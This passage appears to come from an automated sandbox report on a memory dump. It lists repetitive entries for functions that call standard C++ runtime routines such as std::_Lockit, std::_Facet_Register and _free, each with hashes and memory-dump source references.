Opcode Fuzzy Hash: 9067be3ae5c0c1c7dcdebd773305989235912e30f6b5d4d57de95c100dd03434
Instruction Fuzzy Hash: FA01C439A00119DBCF05DBE8C814AFE777ABFC4318F244909E921AB280DF3099C5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5DB3, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5DBA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5DC4

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5E15
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5E35
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5E42

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 470432da338c2cb162cbecc4e6887e489435d8adae3c54b98c48debbb5820ce5
Instruction ID: abbc079c185062a873650140a2f92367c35cf7ec132ceff4be672a5a3b8b58d0
Opcode Fuzzy Hash: 470432da338c2cb162cbecc4e6887e489435d8adae3c54b98c48debbb5820ce5
Instruction Fuzzy Hash: D101C4399001199FCF05DBE8C814AFEB7B9AF84314F244919E921AB280CF719DC9EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5ACA, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5AD1
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5ADB

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5B2C
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5B4C
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5B59

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 4bb6d058d6ab0380a994999c1c51bf81a375c4d2895b10ab47d99573a9d42e54
Instruction ID: 7309d9075ccbe0192cc3475ae642f733b615cd0d104a48ee4987bd0c9e5fc04a
Opcode Fuzzy Hash: 4bb6d058d6ab0380a994999c1c51bf81a375c4d2895b10ab47d99573a9d42e54
Instruction Fuzzy Hash: 3B01C479900119CFCF05DBE8D910AFDBB7ABF84314F244809E921AB280CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5B5F, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5B66
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5B70

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1A5BC1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5BE1
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5BEE

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 3b6e886f5c190a6dbbe6e1c9471ac319a40ee38874849bcd7e33f18b27fb2d75
Instruction ID: f784c16ac2074349849e473471499696e2d9237f722dcf791dedc2107dfd37d2
Opcode Fuzzy Hash: 3b6e886f5c190a6dbbe6e1c9471ac319a40ee38874849bcd7e33f18b27fb2d75
Instruction Fuzzy Hash: F601C4799041198BCF05DBE8C914AFD77BABFC4314F240819E911AB280CF3099C8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19981C, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199823
std::_Lockit::_Lockit.LIBCPMT ref: 6E19982D

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E19987E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19989E
Concurrency::cancel_current_task.LIBCPMT ref: 6E1998AB

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 81354c917cfb0efea763789d6747281b0c5840799b47ced74341bcf7d2dd0a4f
Instruction ID: 0ded393684258bff0ee14c6c5065d736be4c36119b1e92fdd071213cbea4ab64
Opcode Fuzzy Hash: 81354c917cfb0efea763789d6747281b0c5840799b47ced74341bcf7d2dd0a4f
Instruction Fuzzy Hash: F601C035A0051A8FCB05DBE4C864AFE77BDAF84314F280919E811AB280CF349AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1998B1, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1998B8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1998C2

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199913
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199933
Concurrency::cancel_current_task.LIBCPMT ref: 6E199940

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: d1d7b2b79f63cd14272b69b42d70213d891bf4fcdd4be9e2812dfe4b29706a27
Instruction ID: cfa45a500bc7539d7bc3f3cd895dc6ddd334d744c3be93c1c3ee13246da88bdf
Opcode Fuzzy Hash: d1d7b2b79f63cd14272b69b42d70213d891bf4fcdd4be9e2812dfe4b29706a27
Instruction Fuzzy Hash: 2301D635A00229DFCF05DBE4C864AFE77B9AF84314F244819E911AB280CF3099C4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1996F2, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1996F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E199703

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199754
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199774
Concurrency::cancel_current_task.LIBCPMT ref: 6E199781

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 245f98f23724903587850dbeea9ba5ab30870c2b6b663192895e167cb6c117c5
Instruction ID: 5eaafbe0e6773fc60773ce2e47ac1865559b0f17b2273c51aa940c37ddae0ee0
Opcode Fuzzy Hash: 245f98f23724903587850dbeea9ba5ab30870c2b6b663192895e167cb6c117c5
Instruction Fuzzy Hash: 6A019639A005199FCF09DFE4D964AFD7779AF84314F244919E811AB280DF3099C5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199787, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19978E
std::_Lockit::_Lockit.LIBCPMT ref: 6E199798

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1997E9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199809
Concurrency::cancel_current_task.LIBCPMT ref: 6E199816

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: dfbe5819dd14b98b8e53bb9a0a06d94f856fdea41f7690a09ee6f5dbf3398442
Instruction ID: a75e34a17e5cfc73609fdb867ac19346fc9ac67af12394ad954cd6a7c5acaf49
Opcode Fuzzy Hash: dfbe5819dd14b98b8e53bb9a0a06d94f856fdea41f7690a09ee6f5dbf3398442
Instruction Fuzzy Hash: 4A01D275A005198FCF05DBE4C924AFE77BAAF84314F244919E811AB280DF349EC4FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19949E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1994A5
std::_Lockit::_Lockit.LIBCPMT ref: 6E1994AF

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199500
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199520
Concurrency::cancel_current_task.LIBCPMT ref: 6E19952D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: e60d9963873791142cd5ec9f814eca9c77b510eb5bc2c0a00ec414544fcb38fa
Instruction ID: 304965b77cae73b617bea79dc6c20b48b8e1b8d94871399632200c9b0c65a8d4
Opcode Fuzzy Hash: e60d9963873791142cd5ec9f814eca9c77b510eb5bc2c0a00ec414544fcb38fa
Instruction Fuzzy Hash: 9E0184B59005199FCF05DBE4D864AFE7779BF84314F244909E821AB290CF709AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1934F1, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1934F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E193502

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E193553
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193573
Concurrency::cancel_current_task.LIBCPMT ref: 6E193580

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 8e9793d7d8f9d540b42261c369a5d6d693fd46efb884ed5ed65e81fe2696e059
Instruction ID: 26f09a5d5d68d31964b39b6bd944dfd069fc936176d831c07e34d94b45f09b13
Opcode Fuzzy Hash: 8e9793d7d8f9d540b42261c369a5d6d693fd46efb884ed5ed65e81fe2696e059
Instruction Fuzzy Hash: 43018479A00519DFCB06DBE4D8546EE77B9AF84314F244849E815AB280DF30DAC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199533, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19953A
std::_Lockit::_Lockit.LIBCPMT ref: 6E199544

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199595
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1995B5
Concurrency::cancel_current_task.LIBCPMT ref: 6E1995C2

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 6c47e9028ae1c1244a2df7f967daf6b40876b43498ff11e2b6a83b813fa47b18
Instruction ID: 84dfd3b6f4dfdbcf1ccb9d8ddfb0604cea7001353bbad243d6fce4a185ca67e2
Opcode Fuzzy Hash: 6c47e9028ae1c1244a2df7f967daf6b40876b43498ff11e2b6a83b813fa47b18
Instruction Fuzzy Hash: 6401C475A001199FCB05DBE4D824AFE7779AF84314F244909E812AB280CF30DEC8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E193586, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19358D
std::_Lockit::_Lockit.LIBCPMT ref: 6E193597

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1935E8
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193608
Concurrency::cancel_current_task.LIBCPMT ref: 6E193615

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: bca1340ba5b6978a579c7b5907cf40da11f9892440004dd421f794833fc6f063
Instruction ID: 5dc0ecf0093aa5c2fd7aaa294e1ccc9ff0ecd5257c13098035591ba67b102a6f
Opcode Fuzzy Hash: bca1340ba5b6978a579c7b5907cf40da11f9892440004dd421f794833fc6f063
Instruction Fuzzy Hash: 9501C8359005159BCB05DBE4C8146FD777ABF84314F254949D525AB280DF309AC5F751

Uniqueness

Uniqueness Score: -1.00%

Function 6E1995C8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1995CF
std::_Lockit::_Lockit.LIBCPMT ref: 6E1995D9

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E19962A
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19964A
Concurrency::cancel_current_task.LIBCPMT ref: 6E199657

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: b55e0cb03f19d12d60bb1de78994e5a5f22c2dc86b64874f37de05a11e76bd12
Instruction ID: fd1e8ffaef74a995377b76ec1c2cf678ee96b9ef2237b59f72e05b6be5e3bb92
Opcode Fuzzy Hash: b55e0cb03f19d12d60bb1de78994e5a5f22c2dc86b64874f37de05a11e76bd12
Instruction Fuzzy Hash: 6701C035A001198FCF05DBE4C864AFE77BEAF84314F240809E825AB290CF319AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19908B, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199092
std::_Lockit::_Lockit.LIBCPMT ref: 6E19909C

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1990ED
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19910D
Concurrency::cancel_current_task.LIBCPMT ref: 6E19911A

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 69f2cc6b6a327ca234f64a5c1b5496c1897c78cd81ff0b3418bbbcc355aa8b48
Instruction ID: 857a36f2ed671de1a3cf20e651f656c133df87466ab4c38e8023f070a43b368e
Opcode Fuzzy Hash: 69f2cc6b6a327ca234f64a5c1b5496c1897c78cd81ff0b3418bbbcc355aa8b48
Instruction Fuzzy Hash: 3B01D635A0011A9FCB05DBE4C928AFD777DBF95324F244819E821AB280CF359AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E199120, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199127
std::_Lockit::_Lockit.LIBCPMT ref: 6E199131

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199182
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1991A2
Concurrency::cancel_current_task.LIBCPMT ref: 6E1991AF

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 6b7fa05ac1516b04a7b8a26ed0c8254e640791c8133ebb0d9fbc31e8d381fb22
Instruction ID: c8bc42894fbf45b4e746cd9021823980d768bff9ae9d8a76996701db8287e144
Opcode Fuzzy Hash: 6b7fa05ac1516b04a7b8a26ed0c8254e640791c8133ebb0d9fbc31e8d381fb22
Instruction Fuzzy Hash: 7101A135A005159FCF05DBE4D8246FE77A9BF84324F244819E815AB280CF719EC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1991B5, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1991BC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1991C6

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199217
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199237
Concurrency::cancel_current_task.LIBCPMT ref: 6E199244

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 3af6df18908e2c2d76a4eeb1dcdb9600daa0173c6835effa8d0a0b87d025b30e
Instruction ID: d6b66b6adfb652e5ce4050366fa8e97829aad5162ff4ed65cdec3f9817120acf
Opcode Fuzzy Hash: 3af6df18908e2c2d76a4eeb1dcdb9600daa0173c6835effa8d0a0b87d025b30e
Instruction Fuzzy Hash: EB01C43590011A9FCF05DBE4C864AFD77B9AF84714F254859E821AB280CF3099C8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDD12, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DDD2A

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DDD3C
_free.LIBCMT ref: 6E1DDD4E
_free.LIBCMT ref: 6E1DDD60
_free.LIBCMT ref: 6E1DDD72

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
